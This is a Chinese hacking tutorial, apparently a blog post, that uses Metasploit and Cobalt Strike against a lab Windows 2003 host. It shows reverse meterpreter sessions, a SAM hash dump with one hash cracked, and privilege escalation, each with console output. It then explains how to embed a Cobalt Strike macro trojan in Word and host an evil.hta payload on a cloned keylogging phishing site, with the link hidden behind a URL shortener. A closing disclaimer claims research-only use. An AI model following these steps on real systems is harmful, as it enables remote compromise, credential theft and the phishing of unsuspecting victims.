三、結合metasploit,反彈shell
??在kali中開啟使用命令開啟metasploit
msfconsole┌──(root?oldboy)-[~]
└─# msfconsole
---
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
---
msf6 exploit(multi/handler) > show optionsModule options (exploit/multi/handler):Name Current Setting Required Description---- --------------- -------- -----------Payload options (generic/shell_reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------LHOST yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 Wildcard Target---
msf6 exploit(multi/handler) > set lhost 10.0.0.200
lhost => 10.0.0.200
---msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
---
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
---在靶機中
使用Cobalt Strike創建一個windows/foreign/reverse_tcp的Listener。其中ip為Metasploit的ip地址(10.0.0.200),端口為Metasploit所監聽的端口(7777)。
開始攻擊,建立會話:
msf6 exploit(multi/handler) > run[*] Started HTTP reverse handler on http://10.0.0.200:7777
[!] http://10.0.0.200:7777 handling request from 10.0.0.101; (UUID: 2sotjla4) Without a database connected that payload UUID tracking will not work!
[*] http://10.0.0.200:7777 handling request from 10.0.0.101; (UUID: 2sotjla4) Staging x86 payload (176220 bytes) ...
[!] http://10.0.0.200:7777 handling request from 10.0.0.101; (UUID: 2sotjla4) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.0.0.200:7777 -> 127.0.0.1) at 2024-05-28 21:41:00 +0800----
meterpreter > shell
Process 1152 created.
Channel 1 created.
Microsoft Windows [�汾 5.2.3790]
(C) ��?���� 1985-2003 Microsoft Corp.C:\Documents and Settings\Administrator\����>ipconfig
ipconfigWindows IP ConfigurationEthernet adapter ��������:Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 10.0.0.101Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : 10.0.0.254C:\Documents and Settings\Administrator\����>
如果有其他的主機上線,在增加會話中選擇msf(的端口),該上線主機也能反彈shell
這樣我們就可以利用metaspliot中的相關工具,進行進一步滲透。
?滲透:
C:\Documents and Settings\Administrator\����>^C
Terminate channel 1? [y/N] y
--------------------------------------------------
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessions -iActive sessions
===============Id Name Type Information Connection-- ---- ---- ----------- ----------1 meterpreter x86/win OLDBOY-F74D04FE\Admi 10.0.0.200:7777 -> 1dows nistrator @ OLDBOY-F 27.0.0.1 (10.0.0.10174D04FE )msf6 exploit(multi/handler) > search ms17-010Matching Modules
================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code ExecutionInteract with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce msf6 exploit(multi/handler) > use ...
msf6 exploit(multi/handler) > sessions -iActive sessions
===============Id Name Type Information Connection-- ---- ---- ----------- ----------1 meterpreter x86/win OLDBOY-F74D04FE\Admi 10.0.0.200:7777 -> 1dows nistrator @ OLDBOY-F 27.0.0.1 (10.0.0.10174D04FE )
------------
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...----------
meterpreter > hashdump
123:1015:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204beb12283678:::
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
ASPNET:1006:31ca4e307dc8dd4939d0ac34166cf041:47acc6d9ea07e60931e2a49bb6433aae:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_OLDBOY-F74D04FE:1003:bc210210ecc96be6fd0522aa8ea96524:23561981a86db65e75fd296999b95667:::
IWAM_OLDBOY-F74D04FE:1004:cac4a79fa775cb9b8665ee4c08ed3930:8856078abf69a2bb27f287b8afde005b:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:03ebb3c522071ac94b606f483fc10157:::
meterpreter >
如:Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::?
哈希值:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
解碼:123456?
哈希值可通過cmd5解碼:?
?幫助:
meterpreter > ?Core Commands
=============Command Description------- -----------? Help menubackground Backgrounds the current sessionbg Alias for backgroundbgkill Kills a background meterpreter scriptbglist Lists running background scriptsbgrun Executes a meterpreter script as a backgroundthreadchannel Displays information or control active channelsclose Closes a channeldetach Detach the meterpreter session (for http/https)disable_unicode_encoding Disables encoding of unicode stringsenable_unicode_encoding Enables encoding of unicode stringsexit Terminate the meterpreter sessionget_timeouts Get the current session timeout valuesguid Get the session GUIDhelp Help menuinfo Displays information about a Post moduleirb Open an interactive Ruby shell on the currentsessionload Load one or more meterpreter extensionsmachine_id Get the MSF ID of the machine attached to thesessionmigrate Migrate the server to another processpivot Manage pivot listenerspry Open the Pry debugger on the current sessionquit Terminate the meterpreter sessionread Reads data from a channelresource Run the commands stored in a filerun Executes a meterpreter script or Post modulesecure (Re)Negotiate TLV packet encryption on the sessionsessions Quickly switch to another sessionset_timeouts Set the current session timeout valuessleep Force Meterpreter to go quiet, then re-establish sessionssl_verify Modify the SSL certificate verification settingtransport Manage the transport mechanismsuse Deprecated alias for "load"uuid Get the UUID for the current sessionwrite Writes data to a channelStdapi: File system Commands
============================Command Description------- -----------cat Read the contents of a file to the screencd Change directorychecksum Retrieve the checksum of a filecp Copy source to destinationdel Delete the specified filedir List files (alias for ls)download Download a file or directoryedit Edit a filegetlwd Print local working directorygetwd Print working directorylcat Read the contents of a local file to the screenlcd Change local working directorylls List local fileslpwd Print local working directoryls List filesmkdir Make directorymv Move source to destinationpwd Print working directoryrm Delete the specified filermdir Remove directorysearch Search for filesshow_mount List all mount points/logical drivesupload Upload a file or directoryStdapi: Networking Commands
===========================Command Description------- -----------arp Display the host ARP cachegetproxy Display the current proxy configurationifconfig Display interfacesipconfig Display interfacesnetstat Display the network connectionsportfwd Forward a local port to a remote serviceresolve Resolve a set of host names on the targetroute View and modify the routing tableStdapi: System Commands
=======================Command Description------- -----------clearev Clear the event logdrop_token Relinquishes any active impersonation token.execute Execute a commandgetenv Get one or more environment variable valuesgetpid Get the current process identifiergetprivs Attempt to enable all privileges available to the currentprocessgetsid Get the SID of the user that the server is running asgetuid Get the user that the server is running askill Terminate a processlocaltime Displays the target system local date and timepgrep Filter processes by namepkill Terminate processes by nameps List running processesreboot Reboots the remote computerreg Modify and interact with the remote registryrev2self Calls RevertToSelf() on the remote machineshell Drop into a system command shellshutdown Shuts down the remote computersteal_token Attempts to steal an impersonation token from the targetprocesssuspend Suspends or resumes a list of processessysinfo Gets information about the remote system, such as OSStdapi: User interface Commands
===============================Command Description------- -----------enumdesktops List all accessible desktops and window stationsgetdesktop Get the current meterpreter desktopidletime Returns the number of seconds the remote user has been idlekeyboard_send Send keystrokeskeyevent Send key eventskeyscan_dump Dump the keystroke bufferkeyscan_start Start capturing keystrokeskeyscan_stop Stop capturing keystrokesmouse Send mouse eventsscreenshare Watch the remote user desktop in real timescreenshot Grab a screenshot of the interactive desktopsetdesktop Change the meterpreters current desktopuictl Control some of the user interface componentsStdapi: Webcam Commands
=======================Command Description------- -----------record_mic Record audio from the default microphone for X secondswebcam_chat Start a video chatwebcam_list List webcamswebcam_snap Take a snapshot from the specified webcamwebcam_stream Play a video stream from the specified webcamStdapi: Audio Output Commands
=============================Command Description------- -----------play play a waveform audio file (.wav) on the target systemPriv: Elevate Commands
======================Command Description------- -----------getsystem Attempt to elevate your privilege to that of local system.Priv: Password database Commands
================================Command Description------- -----------hashdump Dumps the contents of the SAM databasePriv: Timestomp Commands
========================Command Description------- -----------timestomp Manipulate file MACE attributes
上面使用的哈希值: meterpreter > hashdump
cs提權
右擊執行--提取--選擇攻擊方式--
執行成功--自動新建會話提權為SYSTEM:
?建議在msf進行提權(使用use exploit/windows/local模塊)payload較cs強大
?
msf提權大致流程 :
┌──(root?oldboy)-[~]
└─# msfconsole
-------msf6 >use exploit/windows/local19 exploit/windows/local/mqac_write 2014-07-22 average Yes MQAC.sys Arbitrary Write Privilege Escalation20 exploit/windows/local/ms11_080_afdjoinleaf 2011-11-30 average No MS11-080 AfdJoinLeaf Privilege Escalation21 exploit/windows/local/ms13_005_hwnd_broadcast 2012-11-27 excellent No MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation
----------------
msf6 > use exploit/windows/local/ms11_080_afdjoinleaf
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms11_080_afdjoinleaf) > show options Module options (exploit/windows/local/ms11_080_afdjoinleaf):Name Current Setting Required Description---- --------------- -------- -----------SESSION 3 yes The session to run this module onPayload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC thread yes Exit technique (Accepted: '', seh,thread, process, none)LHOST 10.0.0.200 yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 Automaticmsf6 exploit(windows/local/ms11_080_afdjoinleaf) > sessions -iActive sessions
===============Id Name Type Information Connection-- ---- ---- ----------- ----------1 meterpreter x86/win OLDBOY-F74D04FE\Admi 10.0.0.200:7777 -> 1dows nistrator @ OLDBOY-F 27.0.0.1 (10.0.0.10174D04FE )2 meterpreter x86/win OLDBOY-F74D04FE\Admi 10.0.0.200:7777 -> 1dows nistrator @ OLDBOY-F 27.0.0.1 (10.0.0.10174D04FE )3 meterpreter x86/win NT AUTHORITY\SYSTEM 10.0.0.200:4444 -> 1dows @ OLDBOY-F74D04FE 0.0.0.101:1844 (10.0.0.101)msf6 exploit(windows/local/ms11_080_afdjoinleaf) > run[*] Started reverse TCP handler on 10.0.0.200:4444
[*] Running against Windows Server 2003 SP2
[-] This meterpreter session is already running as SYSTE
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms11_080_afdjoinleaf) >
?步驟解讀:
- 嘗試切換到
exploit/windows/local目錄,查看payload模塊。- 選擇了
exploit/windows/local/ms11_080_afdjoinleaf模塊,Metasploit自動設置了payload為windows/meterpreter/reverse_tcp,這是該模塊需要的payload類型。- 查看了模塊和payload的選項,確認了設置的session為3,監聽的IP地址為10.0.0.200,端口為4444。
- 使用
sessions -i命令列出所有活動的Meterpreter會話。可以看到有三個會話,其中第3個會話是SYSTEM權限的。- 嘗試運行
exploit/windows/local/ms11_080_afdjoinleaf模塊,但收到錯誤消息[-] This meterpreter session is already running as SYSTEM,這意味著攻擊者已經在具有SYSTEM權限的會話(session 3)中,所以嘗試通過該漏洞進一步提權是不必要的,因為權限已經是最高的了。- 最后,Metasploit確認了漏洞利用過程完成,但沒有創建新的會話,這通常是由于權限已經達到最高,無需再提升。
office宏payload應用
環境:虛擬機windows-xp? office2003? ? cs軟件
第一步、生成office宏
?
第二步,把cs生成的代碼放到word宏里面去?
?原內容刪除粘貼cs宏木馬--保存--關閉
?編輯文件內容后--保存關閉?
cs 生成的代碼直接放到創建里面去,注意:做試驗的時候,宏的位置不要設置所有的活動模板和文檔,建議應用在當前文檔,不然本機所有word文檔運行都會種上你的木馬,另外打開word文檔有宏提示,一般是word默認禁用所有宏(高版本:文件—選項—信任中心—信任中心設置里面配置;低版本:工具-選項-安全性-宏安全性-選擇低)。?
?
?打開文件:
?成功監聽:?
hta網頁掛馬
HTA是HTML Application的縮寫(HTML應用程序),是軟件開發的新概念,直接將HTML保存成HTA的格式,就是一個獨立的應用軟件,與VB、C++等程序語言所設計的軟件界面沒什么差別。
?把生成的evil.hta上傳到cs服務器端:
cs客戶端--攻擊--釣魚攻擊--文件下載:
?填寫evil.hta文件位置進行上傳--URL根目錄下evil.hta--主機地址:服務器主機IP--端口自定義--Mime默認:
生成的網站:
http://10.0.0.200:89/evil.hta
查找上傳服務器文件位置:
cs服務器端kali2022(IP:10.0.0.200)?
┌──(root?oldboy)-[~]
└─# cd /root/cobaltstrike4┌──(root?oldboy)-[~/cobaltstrike4]
└─# ls
手冊 crackInfo.txt keytool.exe peclone
agscript cs.bat Ladon Scripts
c2lint csnat Ladon911 teamserver
cobaltstrike.auth csnat.rar libicmp64.so teamserver.bat
cobaltstrike.bat cs.sh libicmp.so third-party
CobaltStrikeCN.jar data libtapmanager64.so uploads
cobaltstrike.jar ElevateKit libtapmanager.so
cobaltstrike.store icon.jpg logs┌──(root?oldboy)-[~/cobaltstrike4]
└─# cd /root/cobaltstrike4/uploads┌──(root?oldboy)-[~/cobaltstrike4/uploads]
└─# ls
evil.hta
?克隆網站:
(如果之前設置過釣魚頁面,記得一定要刪掉,不然會克隆的時候會報錯)
?
?生成的網站:
http://10.0.0.200:88/
?
?通過在線平臺生成短鏈接:
1、https://uutool.cn/dwz/
?2、https://www.metools.info/master/shorturl180.html
生成的短鏈接:
https://3mw.cn/11fa2
?需受害者手工點擊保留下載后點擊文件運行:
?
?運行后成功監控:
克隆網站選擇了開啟鍵盤記錄,視圖--web日志查看鍵盤記錄:
?
聲明:
- 此文章只做技術研究,謹遵守國家相關法律法規,請勿用于違法用途,如果您對文章內容有疑問,可以嘗試留言私信,如有侵權請聯系小編處理。
![[10] CUDA程序性能的提升 與 流](http://pic.xiahunao.cn/[10] CUDA程序性能的提升 與 流)
+01背包,藍橋云課 搬磚)
 FQTSS協議介紹)
】)
